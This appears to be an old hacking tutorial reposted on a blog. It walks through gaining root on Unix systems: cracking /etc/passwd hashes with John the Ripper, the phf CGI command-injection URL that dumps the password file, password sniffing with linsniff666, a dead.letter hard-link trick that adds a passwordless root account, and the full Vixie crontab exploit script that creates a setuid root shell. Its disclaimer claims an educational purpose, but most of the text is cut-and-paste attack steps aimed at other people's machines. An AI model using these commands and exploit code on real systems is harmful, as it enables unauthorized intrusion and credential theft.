==============================Hacking Tutorial=================================
-------------------This is really a SCRIPT KIDDIE tutorial---------------------
===============================================================================
All attempts to break into another computer is illigal, I am NOT responible
if anyone is so retarded that they try to steal data or break into another
computer after reading this.
This file contains information of how a 'hacker' does that, and should be
read as informative reading to learn how to protect one self from 'hackers'.
===============================================================================
Here we go, with a hacking tutorial .... I know many who probably don't want
me to write this, cause it will take alot of the magic away from hacking
for those who look up to hackers .......
I will try to explain this as easy as possible, so that even the most
lame windows user *could* break into something by reading this tutorial.
To REALLY understand this file you got to know the basics of UNIX.
But I'll try to write it in mostly 'cut and paste' examples with
explanations.
The main reason I'm writing this is cause I am a firm believer of that, the
more people who know how the break security, the more people there will be
that knows how to make security.
And another reason is that most hacking tutorials or texts Iv seen contains
little or no `hacking` at all, they are just breve UNIX command texts
made by people that thinks that "file" is spellt "phile" or that "hacker" is
spellt "hax0r" or some lame crap like that, most likely they can't hack there
way out of a closet.
So if you feel the unstopeble urge to beeing taken like a lamer or beeing
laughed at, spell words all wrong on purpose.
I'm not writing this to make even more lamers call themselves hackers,
I'm making it to show that any lamer can download a pre-made exploit
and use it ... and how easy it really is to break computer security.
One thing with hacking is that you can NOT go around and call yourself a hacker
if your a windows user, you will only make an ass out of yourself.
One can do some simple hacking from windows as to exploit cgi/phf holes,
or telnet to UNIX systems and work from them.
But to do REAL hacking you need to have your own Linux or UNIX system
to have the control you over it you need, and most to really learn it.
In this tutorial I will NOT take up anything about Bo (Back Orifice; made by
the Cult of the dead cow) or netbus (originally 'nat bus' made by a Swedish
programmer), because nether of them are even remotely hacking.
They are attempts to be backdoors, and have nothing to do with
nether hacking or virii (viruses) as some computer ilitterat people think.
And one more thing, to break into a system has nothing to do with REAL hacking
REAL hacking is to back engener a program, find a vunerebilety and code
something that may exploit it, or fix it, that's the hacking part of it.
the actual use of the exploits which I will show in this tutorial
has nothing to do with the real term hacking, this is just to illustrate
how easy it is to break into computers.
The name of this tutorial is hacking.tutor because more script kiddies
will read it by that name and may come to realize that they are not hackers,
which would make me happy.
===============================================================================
1 - Older techniques & Local Exploits.
===============================================================================
There are several ways of hacking, but they all have one in common, to exploit
a bug or weakness in a system or a program to make it do something your
normally not allowed to do, or to gain the info you need from a place
to do the same.
The oldest most well known way to gain root (superuser) access to by cracking
the root password in the /etc/passwd file
If you already have a shell account on a *nix (any sort of unix/linux) computer
you can do as follows to gain root access (except in the cases I'll state
after this) :
-------------------------------------------------------------------------------
First get a password bruteforcing program such as john-1.6, you can get that
at almost any place where they have *nix hacking utiletys.
Just user 'lynx' from the command line as "lynx http://www.metacrawler.com"
to get to a search engine .... search and download it...
unpack it: tar -zvxf john-1.6.tar.gz ('tar -zvxf' for all files ending
with '.tar.gz' or '.tgz'
after that you do like this:
[user@localhost user]$ cd john-1.6/run/
[user@localhost run]$ cat /etc/passwd | grep root > tmp.pass
[user@localhost run]$ ./john -wordfile:password.lst tmp.pass
Loaded 1 password (FreeBSD MD5 [32/32])
monopoly (root)
guesses: 1 time: 0:00:10:02 100% c/s: 1057 trying: monopoly
[user@localhost run]$ su root
Password:
[root@localhost run]#
And *boom* you are root .... you might want to get a bigger word dictionary then
the default 'password.lst' that comes with john, so if you can't crack the
password, search for a bigger dictionary file.
Where this method doesn't work is when the computer have a 'shadow' password
file, if so you will only be able to see an 'x' where the encrypted password
would have been, as this:
/etc/passwd (when there is no shadow file)
root:k5cunkPfiKy/Y:0:0:root:/root:/bin/bash
/etc/passwd (when there is a shadow file)
root:x:0:0:root:/root:/bin/bash
If you don't have a user account or if the computer have a shadowed passwd
file, you move on to the next methods.
-------------------------------------------------------------------------------
If you don't have a shell you might want to try to get the password with
the VERY old phf trick .... this is one of the oldest tricks in the book,
and it only works on very old systems, (as far as I know only on NSCA
web servers, but it might work on some other old web servers too).
To use the phf trick you need any web browser, in this example I'll use lynx.
[user@localhost user]$ lynx http://www.the-host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
And if that works it will display the password file to you...
The 'www.the-host.com' part is where you type the IP or hostname of the
computer you want to get the password file from.
And if you get it displayed: highlight as many lines as you can and paste
them into a file, then use John-1.6 or similar to crack the passwords.
then telnet to the computer, using a a non-root account and su to root once
your in.
Most systems will not allow you to telnet to them as root, that's why you
need a user account and then 'su' (Substitute User Super User) to root.
-------------------------------------------------------------------------------
note: Some thinks that 'su' means "switch user" .... it doesn't.
The manual pages tells that it means Substitute User and UNIX admin bible
says Super User ...)
-------------------------------------------------------------------------------
If you are on the same internal network (or LAN with same C class IP) as the
computer you want to hack you can use a sniffer to sniff passwords and so.
Good sniffers are sniffit, linsniff666 and linsniffer ... there is some
version of sniffit to Windows but I heard it sucks.
Get any of them, if they come in a '.c' file you need to compile it.
And to do that you do this:
[user@localhost user]$ gcc linsniff666.c -o linsniff666
(or: gcc -o linsniff666 linsniff666.c ---- really the same thing)
After that you do this:
[user@localhost user]$ ./linsniff666 &
[1] 24271
eth0: Setting promiscuous mode.
[user@localhost user]$
All that linsniff666 sniffes will be logged to a file called 'tcp.log'
To view it as it happens you can do this:
[user@localhost user]$ tail -f tcp.log
============================================================
Time: Tue Nov 16 01:29:27 Size: 44
Path: d212-151-231-70.swipnet.se => mail.swipnet.se [110]
------------------------------------------------------------
USER asd655a4
PASS 1ds8976as
STAT
QUIT
============================================================
Time: Tue Nov 16 01:29:07 Size: 32
Path: d212-151-231-73.swipnet.se => ftp.sunet.se [21]
------------------------------------------------------------
============================================================
Time: Tue Nov 16 01:29:07 Size: 32
Path: d212-151-231-73.swipnet.se => ftp.sunet.se [21]
------------------------------------------------------------
Then 'Ctrl+C' to get out from the listing.
To shut linsniff666 off you do this:
[user@localhost user]$ killall -15 linsniff666
As simple as that.
And yes this log is fabricated, so the passwords are fake =)
Always read the manuals if there are any.
-------------------------------------------------------------------------------
But more about remote hacking later, for now let's stick to local exploits.
-------------------------------------------------------------------------------
Here is a VERY old example of an exploit that doesn't work on any newer system
as far as I know.
[user@localhost user]$ ln /etc/passwd /var/spool/mail/dead.letter
[user@localhost user]$ echo "abc::0:0:root:/root:/bin/bash" | mail a@bogus.a
[user@localhost user]$ su - abc
Password: <<===== here just press enter.
[abc@localhost root]#
Here we have hard linked "dead.letter", (the place where mails go if the
destination address can't be found) to /etc/passwd, that means that
all that comes into dead.letter also goes to /etc/passwd and since
Sendmail operates as root, it have the write rights to /etc/passwd.
Then we mail a password-less root (uid/gid 0) to a mail address that doesn't
exist.
And after that we 'su' to that root user.
Now this bug is fixed a long time a go, and those systems that still
might have it, have there /var directory on a separate HD partition,
and 'ln' can't hard link files that are on different partitions.
But this still gives you an idea of how an exploit might work.
-------------------------------------------------------------------------------
Now I'll take one more local exploit example, this one still works.
As far as I know it works on RedHat up to version 6.0 and S.u.S.E.
on versions up to 6.2, haven't heard anything about other Linux distros
but it might work on alot of distros that uses crontab 3.0.1.
===============================================================================
Here follows the exploit source code exactly as I got it from bugtraq.
===============================================================================
Subject: Vixie Crontab exploit code
To: BUGTRAQ@SECURITYFOCUS.COM
Vixie Crontab exploit code
begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh
# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include
#include
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=/usr/bin/procmail/P=/tmp/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait
echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex
--
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
===============================================================================
Note: I think this code is made bigger then it have to be on purpose.
It can be done about half as big.
===============================================================================
To make this work:
Cut away what comes before "#!/bin/sh" and after "crontab /dev/null", name
it something like crontab_exploit.sh and do "chmod a+x crontab_exploit.sh".
then ./crontab_exploit.sh ...... as this following example:
-------------------------------------------------------------------------------
[user@localhost user]$ ./crontab_exploit.sh
make shell
compile shell
/usr/bin/ld: cannot open output file /tmp/sh: Permission denied
collect2: ld returned 1 exit status
/usr/bin/ld: cannot open output file /tmp/sh: Permission denied
collect2: ld returned 1 exit status
make execute shell script
hack sendmail.cf
make cron file
input cron file
wait for 1 minute
execute shell
bash# whoami
root
bash# exit
delete data files
[user@localhost user]$
-------------------------------------------------------------------------------
make shell <<== makes a .c file that will setuid & setgid 0.
compile shell <<== does what it says, here it compiles the .c file.
make execute shell script <<== makes a script that changes owner & group of
the compiled .c file to root and suides it.
hack sendmail.cf <<== here it changes the "DefaultUser" in a copy of sendmail's
config file to root, and changes /usr/bin/procmail to
the script I just mentioned.
make cron file <<== here it makes a file that will mail some crontab stuff
using the new sendmail.cf copy.
input cron file <<== executing the sendmail.cf copy.
wait for 1 minute <<== does exactly that, and then executes the newly made
root shell.
The "bash#" is the root 'sh' prompt.
A 'whoami' to check if we really are 'root', and exit to go back to
normal user mode again, and note that when we exit to user again, it
deletes the temporary exploit files.
-------------------------------------------------------------------------------
Most of the older techniques still to applies to this day, because of the way
an operating system is built.
But enough of that for for now, let's move on to remote exploits and such
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment